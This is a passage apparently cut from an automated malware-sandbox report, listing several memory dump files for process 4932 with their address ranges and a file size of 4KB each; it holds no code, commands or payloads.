                                                        Filesize

                                                        4KB

                                                      • memory/4932-145-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-154-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-153-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-151-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-150-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-152-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB